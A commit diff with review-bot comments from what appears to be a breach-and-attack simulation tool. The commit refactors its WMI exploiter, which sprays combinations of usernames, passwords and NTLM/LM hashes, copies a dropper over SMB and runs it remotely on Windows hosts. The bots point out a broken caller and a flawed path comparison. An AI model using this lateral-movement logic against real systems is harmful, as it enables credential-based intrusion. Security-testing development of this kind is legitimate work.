Agent: decouple wmiexec.py from WormConfig object

vakarisz 2022-03-08 14:56:22 +02:00
parent d7e222c8a8
commit c932a19b47
3 changed files with 29 additions and 20 deletions


@ -151,20 +151,6 @@ class Configuration(object):
"""
return product(self.exploit_user_list, self.exploit_ssh_keys)
def get_exploit_user_password_or_hash_product(self):
"""
Returns all combinations of the configurations users and passwords or lm/ntlm hashes
:return:
"""
cred_list = []
for cred in product(self.exploit_user_list, self.exploit_password_list, [""], [""]):
cred_list.append(cred)
for cred in product(self.exploit_user_list, [""], [""], self.exploit_ntlm_hash_list):
cred_list.append(cred)
for cred in product(self.exploit_user_list, [""], self.exploit_lm_hash_list, [""]):
cred_list.append(cred)
return cred_list
@staticmethod
def hash_sensitive_data(sensitive_data):
"""


@ -52,6 +52,7 @@ class SmbExploiter(HostExploiter):
logger.info("Can't find suitable monkey executable for host %r", self.host)
return False
# TODO extract the method in wmiexec.py
creds = self._config.get_exploit_user_password_or_hash_product()
exploited = False
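Review bot: The call `self._config.get_exploit_user_password_or_hash_product()` left under the new TODO appears to target the method this same commit deletes from `Configuration`. Unless `self._config` is some other type here, the SMB exploiter would raise `AttributeError` as soon as it reaches this line. The TODO records the intent but leaves the caller broken in the meantime. Either keep the `Configuration` method until this caller is migrated, or move the helper to a shared module and call it here the way the WMI exploiter now does, `creds = _get_exploit_user_password_or_hash_product(self.options["credentials"])`, assuming `self.options` carries the same keys in this class. The enclosing method starts and ends outside the hunk.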


@ -2,13 +2,14 @@ import logging
import ntpath
import socket
import traceback
from typing import List
from itertools import product
from typing import List, Mapping
from impacket.dcerpc.v5.rpcrt import DCERPCException
from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
from infection_monkey.exploit.tools.helpers import get_monkey_depth
from infection_monkey.exploit.tools.smb_tools import SmbTools
from infection_monkey.exploit.tools.wmi_tools import AccessDeniedException, WmiTools
from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
@ -28,7 +29,7 @@ class WmiExploiter(HostExploiter):
@WmiTools.dcom_wrap
def _exploit_host(self):
creds = self._config.get_exploit_user_password_or_hash_product()
creds = _get_exploit_user_password_or_hash_product(self.options["credentials"])
for user, password, lm_hash, ntlm_hash in creds:
creds_for_log = _get_credential_string([user, password, lm_hash, ntlm_hash])
@ -83,20 +84,20 @@ class WmiExploiter(HostExploiter):
password,
lm_hash,
ntlm_hash,
self._config.smb_download_timeout,
self.options["smb_download_timeout"],
)
if not remote_full_path:
wmi_connection.close()
return False
# execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
elif remote_full_path.lower() != self.options["dropper_target_path_win_64"]:
cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path": remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
self._config.dropper_target_path_win_32,
self.options["dropper_target_path_win_64"],
)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {
@ -139,6 +140,27 @@ class WmiExploiter(HostExploiter):
return False
def _get_exploit_user_password_or_hash_product(credentials: Mapping) -> List:
"""
Returns all combinations of the configurations users and passwords or lm/ntlm hashes
:return:
"""
cred_list = []
for cred in product(
credentials["exploit_user_list"], credentials["exploit_password_list"], [""], [""]
):
cred_list.append(cred)
for cred in product(
credentials["exploit_user_list"], [""], [""], credentials["exploit_ntlm_hash_list"]
):
cred_list.append(cred)
for cred in product(
credentials["exploit_user_list"], [""], credentials["exploit_lm_hash_list"], [""]
):
cred_list.append(cred)
return cred_list
def _get_credential_string(creds: List) -> str:
cred_strs = [
(creds[0], "username"),
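Review bot: The rewritten check `remote_full_path.lower() != self.options["dropper_target_path_win_64"]` lowercases only the left-hand side, whereas the line it replaces lowercased both. A configured path containing any uppercase character can then never compare equal, so the dropper branch would run even when the file already sits at its final path. Restore the symmetric form: `elif remote_full_path.lower() != self.options["dropper_target_path_win_64"].lower():`. The same lines also switch from the `win_32` to the `win_64` option, which the commit title does not mention and should be confirmed as intended. `_exploit_host` and `_get_credential_string` both extend beyond the visible hunks.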